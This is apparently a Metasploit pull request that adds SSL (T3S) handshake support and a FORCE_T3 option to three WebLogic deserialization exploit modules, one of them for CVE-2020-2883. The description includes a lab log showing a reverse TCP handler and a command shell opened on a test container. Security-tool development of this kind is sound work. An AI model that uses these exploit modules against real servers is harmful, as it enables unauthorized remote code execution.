### PR TITLE
More WebLogic Exploit T3S Support

### DIFF
--- a/modules/exploits/multi/misc/weblogic_deserialize_badattr_extcomp.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_badattr_extcomp.rb
@@ -31,7 +31,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'Author' => [
           'Quynh Le', # Vulnerability Discovery
           'Y4er', # PoC
-          'Shelby Pace' # Metasploit Module
+          'Shelby Pace', # Metasploit Module
+          'Steve Embling' # T3S additions
         ],
         'References' => [
           [ 'CVE', '2020-2883' ],
@@ -60,11 +61,22 @@ class MetasploitModule < Msf::Exploit::Remote
           ],
         ],
         'DisclosureDate' => '2020-04-30',
-        'DefaultTarget' => 0
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Reliability' => [REPEATABLE_SESSION],
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
       )
     )
 
-    register_options([ Opt::RPORT(7001) ])
+    register_options([
+      Opt::RPORT(7001),
+    ])
+
+    register_advanced_options([
+      OptBool.new('FORCE_T3', [false, 'Force T3 protocol even over SSL', false])
+    ])
   end
 
   def check
@@ -73,7 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote
     web_req = "GET /console/login/LoginForm.jsp HTTP/1.1\nHost: #{peer}\n\n"
     sock.put(web_req)
     sleep(2)
-    res = sock.get_once
+    res = sock.get
 
     versions =
       [
@@ -117,7 +129,12 @@ class MetasploitModule < Msf::Exploit::Remote
     # t3 12.2.1\nAS:255
     # \nHL:19\nMS:100000
     # 00\n\n
-    shake = '74332031322e322e310a41533a323535'
+    if !datastore['SSL'] || datastore['FORCE_T3']
+      shake = '7433'
+    else
+      shake = '743373'
+    end
+    shake << '2031322e322e310a41533a323535'
     shake << '0a484c3a31390a4d533a313030303030'
     shake << '30300a0a'
 

--- a/modules/exploits/multi/misc/weblogic_deserialize_marshalledobject.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_marshalledobject.rb
@@ -22,7 +22,8 @@ class MetasploitModule < Msf::Exploit::Remote
         [
         'Andres Rodriguez',  # Metasploit Module - 2Secure (@acamro, acamro[at]gmail.com)
         'Jacob Baines',      # Vulnerability Discovery - Tenable Network Security
-        'Aaron Soto'         # Reverse Engineering JSO and ysoserial blobs
+        'Aaron Soto',        # Reverse Engineering JSO and ysoserial blobs
+        'Steve Embling'      # T3S support
         ],
       'License' => MSF_LICENSE,
       'References' =>
@@ -63,9 +64,20 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'DefaultTarget' => 0,
       'DefaultOptions' => { 'WfsDelay' => 12 },
-      'DisclosureDate' => '2016-07-19'))
+      'DisclosureDate' => '2016-07-19',
+      'Notes' => {
+        'Reliability' => [REPEATABLE_SESSION],
+        'Stability' => [CRASH_SAFE],
+        'SideEffects' => [IOC_IN_LOGS]
+      }))
 
-    register_options([Opt::RPORT(7001)])
+      register_options([
+        Opt::RPORT(7001),
+      ])
+
+      register_advanced_options([
+        OptBool.new('FORCE_T3', [false, 'Force T3 protocol even over SSL', false])
+      ])
   end
 
 =begin   This check is currently incompatible with the Tcp mixin.  :-(
@@ -105,7 +117,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def t3_handshake
     # retrieved from network traffic
-    shake = "t3 12.2.1\n"
+    if !datastore['SSL'] || datastore['FORCE_T3']
+      shake = 't3'
+    else
+      shake = 't3s'
+    end
+    shake << " 12.2.1\n"
     shake << "AS:255\n"
     shake << "HL:19\n"
     shake << "MS:10000000\n\n"

--- a/modules/exploits/multi/misc/weblogic_deserialize_rawobject.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_rawobject.rb
@@ -22,7 +22,8 @@ class MetasploitModule < Msf::Exploit::Remote
         [
         'Andres Rodriguez',  # Metasploit Module - 2Secure (@acamro, acamro[at]gmail.com)
         'Stephen Breen',     # Vulnerability Discovery
-        'Aaron Soto'         # Reverse Engineering JSO and ysoserial blobs
+        'Aaron Soto',        # Reverse Engineering JSO and ysoserial blobs
+        'Steve Embling',     # T3S porting and testing
         ],
       'License' => MSF_LICENSE,
       'References' =>
@@ -62,9 +63,20 @@ class MetasploitModule < Msf::Exploit::Remote
           ]
         ],
       'DefaultTarget' => 0,
-      'DisclosureDate' => '2015-01-28'))
+      'DisclosureDate' => '2015-01-28',
+      'Notes' => {
+        'Reliability' => [REPEATABLE_SESSION],
+        'Stability' => [CRASH_SAFE],
+        'SideEffects' => [IOC_IN_LOGS]
+      }))
 
-    register_options([Opt::RPORT(7001)])
+      register_options([
+        Opt::RPORT(7001),
+      ])
+
+      register_advanced_options([
+        OptBool.new('FORCE_T3', [false, 'Force T3 protocol even over SSL', false])
+      ])
   end
 
 =begin   This check is currently incompatible with the Tcp mixin.  :-(
@@ -106,7 +118,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def t3_handshake
     # retrieved from network traffic
-    shake = "t3 12.2.1\n"
+    if !datastore['SSL'] || datastore['FORCE_T3']
+      shake = 't3'
+    else
+      shake = 't3s'
+    end
+    shake << " 12.2.1\n"
     shake << "AS:255\n"
     shake << "HL:19\n"
     shake << "MS:10000000\n\n"


### PR DESCRIPTION
Continuation of #17458 for the other exploits with review notes applied

There a few more exploits that this can be applied to for which I am not including the changes because I haven't been able to get them to successfully trigger in my test environment so I couldn't guarantee they work or that I haven't broken anything in the process.

## Verification
All exploits tested with and without SSL.

## Caveats
The weblogic_deserialize_rawobject and weblogic_deserialize_marshalledobject exploits do throw SSL errors when the shell connects back and SSL is enabled. This backgrounds the incoming session. The shell does work, so its bad UX rather than breaking behaviour. Probably needs a fix or better error handling somewhere, but I'm not sure what/where:

```[*] Started reverse TCP handler on 172.17.0.1:4444
[*] 172.17.0.2:7002 - Sending handshake...
[*] 172.17.0.2:7002 - Sending T3 request object...
[*] 172.17.0.2:7002 - Sending client object payload...
[*] Command shell session 4 opened (172.17.0.1:4444 -> 172.17.0.2:39818) at 2023-04-06 15:00:59 +0100
[-] 172.17.0.2:7002 - Exploit failed: NameError uninitialized constant Rex::Socket::SslTcp::StreamClosedError
[*] Exploit completed, but no session was created.
msf6 exploit(multi/misc/weblogic_deserialize_rawobject) > sessions -i 4
[*] Starting interaction with 4...
 
ls
```
Hoping somebody can help with this.
